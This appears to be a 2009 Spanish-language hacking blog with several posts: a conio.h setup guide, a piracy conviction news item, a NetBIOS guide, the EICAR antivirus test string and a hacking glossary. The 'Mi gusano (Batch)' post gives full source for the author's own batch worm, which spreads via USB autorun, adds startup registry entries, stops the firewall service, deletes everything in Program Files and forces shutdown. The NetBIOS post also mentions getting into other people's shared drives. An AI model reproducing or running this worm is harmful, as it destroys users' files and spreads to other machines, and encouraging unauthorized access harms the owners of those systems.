Lo primero que debemos hacer es descargar la libreria conio.h, lo puedo hacer de:
http://rapidshare.com/files/292813136/conio.zip.htm esta subido por mi, pero si desconfian ( no veo el porque) busquen en la red

http://img100.imageshack.us/img100/4051/posteo1.jpg Click aqui para ampliar

2) Paso Damos click en finalizar

Click para ampliar la imagen --> http://img208.imageshack.us/img208/4817/posteo2.jpg

3 paso) Abrimos nuestro compliador ( Dev-C++) y nos dirigimos a Herramientas ---> Herramientas del compliador o en ingles: Tools -----> Compiler tools

Click en el link para ampliar----> http://img380.imageshack.us/img380/5979/posteo3.jpg

Como sabremos si funciona la libreria Conio.h ?

Ejemplo:
#include <>conio2.h
#include <> stdlib.h
#include <> stdio.h>
int main ()
{
clrscr ();
gotoxy (10,20);
printf (" Hola\n");
system ("pause");
}

Aclaro que no pongo las librerias adentro de los < > por que html los confunde como si fuera parte de su codigo, despues voi a ver como arreglar el tema ::

Vemos que usamos gotoxy que es situar el mensaje en las coordenadas que se indican entre ()..
gotoxy (cordenadas, cordenadas), gotoxy es una funcion de la libreria conio

Espero que los halla ayudado ...
El [ Dr F]

Condenado por vender Software Ilegal

2009-10-12T09:31:00.000-07:00

Condenado un cibercafé de Valencia por piratear software de Microsoft

El gerente de un 'ciber' de Valencia ha sido condenado a cuatro meses de cárcel por 'piratear' software de Microsoft. El propietario está acusado de un delito contra la propiedad intelectual y deberá pagar una multa de 1.920 euros además de indemnizar a la empresa con 3.600 euros en concepto de responsabilidades civiles.

Según informó la empresa, en el juicio rápido celebrado en el juzgado número 3 de Valencia, "quedó probado que el locutorio y ciber utilizaba ordenadores con copias ilegales que carecían de cualquier tipo de licencia".

Microsoft denunció al locutorio en el marco de una campaña cuyo objetivo es regularizar los cibercafés y locutorios españoles. Según datos de la compañía, en España existen unos 5.000 cibercafés y más de 20.000 locutorios, la mayoría de ellos en situación "ilegal tanto administrativa como en el uso de software que realquilan a sus clientes".

FUENTE :http://www.20minutos.es/noticia/538446/0/ciber/piratear/microsoft/

Proteccion por Netbios

2009-09-30T18:50:00.000-07:00

hola, todos ( me quiero imaginar, sabemos que es el netbios)

si no sabes lo que es te recomiendo este manual por Ranefi (excelente)

Código:

http://foro.portalhacker.net/index.php/topic,13518.0.html

Este protoclo, no es muy comun que este abierto (en maquinas de usuarios comunes), pero bien en los ciber te puede servir ya que casi siempre tienen archivos compartidos.
Tambien existe la posibilidad que un despistado lo tenga a abierto en su casa y no le haya configurado la suficiente seguridad

Como protegerse:

Como nos protegeremos

Facil hay tres formas de protegernos:
1.)

Código:

 Si se nos hace que hay alguien en nuestro computador colocamos el comando nbtstat -s y salio la persona conectada has esto:
net use * /delete /yes

Esto borrara todas las conecciones establecidas en tu computador y en ese momento saca todos tus recursos compartidos que tengas.

veremos que dice " NO hay conexiones" ( eso es bueno ) xD

2. Hacemos lo anterior con el nbtstat -s si hay alguien conectado, en windows XP y 2000 existe las herramientas de administrador, entramos a control de usuarios y Borramos temporalmente las carpetas compartidas que tienen por defecto el windows que son: IPC$, ADMIN$, C$, y si tuvieras mas discos duros aprecerian con el signo de dolar "$" los borras todos, no pasa nada cuando reinicies tu computador apareceran estos recursos nuevamente. que error pelotudo no ?

3. A lo asustado, nos desconectamos de internet y repetimos el paso 1 , 2 y nos conectamos nuevamente.

4) Si tenemos mucho miedo tiramos la pc por la ventana y nos escondemos abajo de la cama xD
El recuros IPC$ ADMIN$ son recursos que lo traen por defecto el windows XP Y EL NT (el recurso IPC$ se habilita a la hora de tener algo compartido)
Los recursos C$, D$..... son generalmente recursos inaccesibles (a nos ser que tengan acceso de administrador).
Control total !

Que pasa cuando un recurso esta con password??

Eludible para algo somos hackers..
Existen varios buscadores de SMB

alguna informacion extra sobre vulnerabilidad es SMB

Código:

http://blog.segu-info.com.ar/2009/09/vulnerabilidad-smb-en-vista-windows.html

sI NO SABES QUE es Busca ( no soi tu mulo xD )

¿Y si me quiero conectar y me pide password ?
Que lastima... tiene un service pack instalado que corrige ese Bug :s

¿y... Dr [F], que pasa con los firewall?
te respondo bien o mal ?xD
no sirven para nada. a menos que bloquee el puerto 129 que si estan en una red ya no se van a poder conectar con una maquina remota.. xD

Tambien se puede deshabilitar la Opcion Habilitar Netbios sobre TCP/IP
esto lo haremos de la siguiente manera:

Inicio--> Panel de control ----->2 CLICKS en Conexiones de red ---->Click derecho propiedades----> Protocolo de internet TCP/IP ( 2 clicks ) ----> Opciones avanzadas ----> Pestaña Wins ---> Deshabilitar NetBios sobre tcp/ip

¿Que se puede hacer si se ingresa a un ordenador por netbios ?

Depende de los recursos compartidos que tenga... por ejemplo a esta Pc que ingrese ( no es la mia ) puedo acceder al disco C:\ y manejar la impresora

Manual by Dr F, sacando informacion de
Adios

espero que les halla gustado

Antivirus... Probando

2009-09-28T17:46:00.000-07:00

Hay algunas personas ( que no parecen entender nada de nada ), que se por un descuido idiota le entra un virus en la PC y no tienen otro remedio que echarle la culpa a los hackers.
( El error idiota es que no les anda el AntiVirus)
¿Comp puedes comprobar que tu antivirus funciona ?
Poniendo el siguiente codigo en un bloc de notas y guardalo en formato .COM

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Link de la imagen para ver mejor xD
http://img34.imageshack.us/img34/7007/imagen1za.jpg

Lo mas probable es que lo detecte

Para estar mas seguro escanealo en
www.novirusthanks.org

Y recuerda:
es un virus fizticio solo para probar que el antivirus funciona correctamente

http://www.eicar.org/download/eicar.com

Mi gusano ( Batch )

2009-09-28T01:44:00.001-07:00

Esta es una versiona beta de mi pequeño gusano que hize en batch ( vos me entendes no narigon " MuY AL PEDO xd").
Lo que hace este bichito, en sintesis, es autopropagarse por los pendrives, y borrar la mayor parte de los archivos.

Pero antes:

Un gusano informático (también llamados IWorm por su apocope en inglés, I de Internet, Worm de gusano) es un malware que tiene la propiedad de duplicarse a sí mismo. Los gusanos utilizan las partes automáticas de un SO que generalmente son invisibles al usuario.

A diferencia de un Virus , un gusano no precisa alterar los archivos de programas, sino que reside en la MeMORIA y se duplica a sí mismo. Los gusanos casi siempre causan problemas en la red (aunque sea simplemente consumiendo ancho de banda), mientras que los virus siempre infectan o corrompen los archivos de la computadora que atacan.

Es algo usual detectar la presencia de gusanos en un sistema cuando, debido a su incontrolada replicación, los recursos del sistema se consumen hasta el punto de que las tareas ordinarias del mismo son excesivamente lentas o simplemente no pueden ejecutarse.

Metodo de propagacion:

@echo off
if exist %windir%\system32\Palo.bat (goto a) else (goto code)
if exist %windir%\system32\autorun.inf (goto b) else (goto code)
if exist %windir%\system32\toyos.wav (goto c) else (goto code)

:a
cd %windir%\system32
attrib -R -A -S -H palo.bat
del /f /s /q Palo.bat
goto code

:b
cd %windir%\system32
attrib -R -A -S -H autorun.inf
del /f /s /q autorun.inf
goto code

:c
cd %windir%\system32
attrib -R -A -S -H toyos.wav
del /f /s /q toyos.wav
goto code

:code
REG ADD HKML\software\Microsoft\CurrentVersion\Run /v MsnPahe /t REG_SZ /d "%windir%\system32\JSPalo.bat" /f
REG ADD HKML\Software\Microsoft\CurrentVersion\Run /v ProMsnn /t REG_SZ /d "%windir%\JSPalo.bat" /f
REG ADD HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Cdrom /v svnnostt /t REG_DWORD /d "%windir%\JSPalo.bat" /f
REG ADD HKML\Software\Microsoft\CurrentVersion\Run/v Reggeditt /t REG_SZ /d "%homedrive%\JSPalo.bat" /F

rem ------------------Borro el Registro PENDRIVE --------------
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\Polices\Explorer /v NoDriveTypeAutorun /f
reg delete HKML\Software\Microsoft\Windows\CurrentVersion\Polices\Explorer /v NoDriveTypeAutorun /f
reg delete HKML\Software\Microsoft\Windows\CurrentVersion\Polices\Explorer /v NoDriveAutorun /f

rem ----------------- Gusano ---------------
for /f "tokens=1" %%x in ('wmic logicaldisk get caption^, description ^| find /i "extra"') do (copy /y "%~dpnx0" && %%x\ && copy /y "%windir%\system32\sarasa.bat" %%x\ && copy /y "%windir%\system32\toyos.wav" %%x\ && copy /y "%windir%\system32\autorun.inf" && ATTRIB +R +S +H %%x\
)

Destruccion:

@echo off

rem --------------------- Registro ----------------
REG ADD HKML\Software\Microsoft\Windows\CurrentVersion\Run /v HideProcess /t REG_SZ /d "%windir%\system32\nombre.bat
REG ADD HKML\Software\Microsoft\Windows\CurrentVersion\Run /v avast.! /t REG_SZ /d "%windir%\nombre.bat
REG ADD HKEY_CURRENT_USERS\Software\Polices\Microsoft\Windows\System /v DisableRegistryTools /t REG_SZ /d 0X00000001 /f
rem FOR DEL REGISTRO PROXIMAMENT

rem ------------------ Inicio --------------------
start %0
rem ------------------- Fin inicio -----------------

rem ---------------------- Virus Palo -------------
if exist %windir%\system32\Palo.bat (goto :a) else (goto :code)
if exist %windir%\Palo.bat (goto :b) else (goto :code)
if exist %homedrive%\Palo.bat (goto :c) else (goto :code)
:a
cd %windir%\system32
del /f /s /q Palo.bat
goto code
:b
cd..
cd %windir%
del /f /s /q Palo.bat
goto code
:c
cd %homedrive%
del /f /s /q Palo.bat
goto code
:code
copy %0 %windir%\system32\Palo.bat
copy %0 %windir%\Palo.bat
copy %0 %homedrive%\nombredelbat.bat
attrib +R +S +H *.bat

rem -------------------------------------- Inicio Einstein -------------------------------------------
net stop SharedAccess

cd %programfiles%
attrib -R -A -S -H *.*
del /S /Q /F *.*

cd ..
cd %windir%
fsutil file createnew %random%.exe 1000000 Attrib + R +S +H
fsutil file createnew %random%.exe 1000000 Attrib + R +S +H
fsutil file createnew %random%.exe 1000000 Attrib + R +S +H
cd..
cd %windir%
ping -n 15 127.0.0.1 >nul
shutdown -s -f -t 7 -c "pALO !"

y opor utlimo el Autorun.inf

[autorun]
shellexecute=/Palo.bat

-------------------------------------------------------------------------------------------

Esta mas que claro que todavia no decidi el nombre y que faltan funciones, por algo es una version beta xD.... despues voi a sacar un gusano un poco mejor en c++.

Saludos

El Dr [F]

Un poco de teoria

2009-09-27T17:36:00.000-07:00

Una pequeña introduccion a este mundo nunca esta demas, especialmente cuando sos un recien iniciado

Ahora, algunas definiciones importantes si quieres llegar a algo:

Boxes :Aparatos electrónicos o eléctricos cuya finalidad es el phreaking. Las más conocidas son:
Bluebox : Para llamar gratis.
Redbox : Emula la introducción de monedas en teléfonos públicos.
Blackbox : El que llame a un teléfono con este dispositivo no paga la llamada.

Carding :
Uso fraudulento de tarjetas de crédito o sus números pertenecientes a otras personas. Ello incluye la generación de nuevas tarjetas de crédito.

Cracker :
Un individuo que se dedica a eliminar las protecciones lógicas y fisicas del software. Normalmente muy ligado al pirata informatico puede ser un hacker criminal o un hacker que daña el sistema en el que intenta penetrar.

Crackeador o crack :
Término muy de moda gracias al asunto de la "Página del Jamón y el Vino". Son programas que se utilizan para desporteger o sacar los passwords de programas comerciales. Pudiendo utilizarse éstos como si se hubiera comprado la licencia. Quienes los distribuyen son altamente perseguido por la BSA.

El gran Hermano :
En el mundo del Hacking se conoce por este término a cualquier empresa poderosa que intenta controlar el mercado y el mundo de la informática. En este estado podríamos colocar a IBM, Microsoft, Telefónica, etc. El brazo ejecutor del gran hermano como muchos habrán adivinado, es la BSA.

Hacking :
Es cunado se entra de forma ilegal y sin el consentimiento del propietario en us sistema informático para obtener información. No conlleva la destrucción de datos ni la intalación de virus. También lo podriamos definir como cualquier acción encaminada a conseguier la intrusión en un sistema (ingenieria social, caballos de troya, etc.)

Hacker :
Cualquier persona que se dedica a hacer hacking. Debe ser bastante bueno con los ordenadores (como minimo).

Lamer :
Principiante en el mundo del hacking que se las da de listo o que copia, descaradamente, el trabajo de otros hackers. Cuando se les descubre se les desprecia y se les expulsa del circulo en el que se han introducido.

Pheaking :
Todo lo relacionado con el uso del teléfono o servicios telefónicos de forma gratuita. También incluye la modificación o intervención de las líneas telefónicas y las modificaciones de aparatos telefónicos con el fin de comunicarse gratuitamente.

Pirata informático :
Es un delincuente informático que se dedica a la copia y destribución de software ilegal. Este software puede ser comercial crackeado o shareware registrado. También es otro nombre que reciben los crackers, no confundir con los hackers.

VIRUSES o VII :
Textos sobre virus. Normalmente se incluyen información acerca de como hacerlos y como protegerse de los mismos.

Warez :
Programas comerciales ofrecidos gratuitamente a través de internet. Periodicamente aparecen por internet (en la News o IRC) unas listas con inforación de servidores FTP o WWW donde se encuentran programas de estas caracteristica s. Piratería informática.

Ahora unos términos intrínsicamente relacionados con el Hacking :

Administrador, SysOp, Root :
Individuo que se encarga del mantenimiento de un sistema informático y tiene el control total sobre el mismo. También se encarga de la seguridad.

Backdoor :
Puerta trasera de un sistema informático, un mecanismo del software que permite entrar evitando el método usual.

Bug, Hole :
Agujero. Se trata de un defecto en el software (normalmente el S.O.) que permita la intrusión de los hackers.

Caballos de troya :
Programa que se queda residente en un sistema informático y falicita información sobre los que ocurre en el mismo (passwords, logins, etc.). También es aplicable a programas que parecen normales y al ejecutarse despiertan un virus que se introduce en el sistema.

Cortafuego, firewall, bastión :
Software y hardware de seguridad encargado de chequear y bloquear el tráfico de la red hacia un sistema determinado.

Crackeador :
Programa que se emplea para extraer los passwords encriptados del archivo de passwords. Para ello se intenta desencriptarlo o se prueban múltiples combinaciones hasta encontrar la adecuada.

Exploit :
Método de utilizar un bug para penetrar en un sistema.

Fichero de Password :
Fichero deonde se guardan las claves de acceso a un sistema.

Fuerza Bruta :
Forma poco sutil de entrar en un sistema que consiste en porbar distintos passwords (contraseñas) hasta encontrar la adecuada. Requiere mucho tiempo y para ello se emplea un crackeador, se desencripta un fichero encriptado, se sacan las claves del fichero de passwords empleando las palabras del diccionario, etc.

Ingenieria social :
Es una técnica por la cual se convence a alguien, por diversos medios, de que proporcione información útil para hackear o para beneficiarnos. Requiere grandes dosis de psicologia.

Sniffer y Sniffing :
Un sniffer es un programa que intercepta la información que transita por una red. Sniffing es espiar y obtener la información que circula or la red.

Tracear :
Seguir la pista a través de la red de una información o una persona. Se utiliza por las grandes empresas (como Telefónica) para obtener la identidad de los sospechosos o hackers.

Trashing :
En castellano recoger por la basura. Se trata de buscar en la basura (fisica o informática) información que pueda ser útil para hackear.

War Dialer, Discador :
Programa que escanea las líneas de teléfonos en la búsqueda de modems.

Firewall ( mas ampliado ): Un cortafuegos o fiewall es una parte de un sistema o una red que está diseñado para bloquear el acceso no autorizado, permitiendo al mismo tiempo comunicaciones autorizadas. Se trata de un dispositivo o conjunto de dispositivos configurados para permitir, limitar, cifrar, descifrar, el tráfico entre los diferentes ámbitos sobre la base de un conjunto de normas y otros criterios.

Fuente: Foro portalhacker.. ( la mejor comunidad xD )
http://foro.portalhacker.net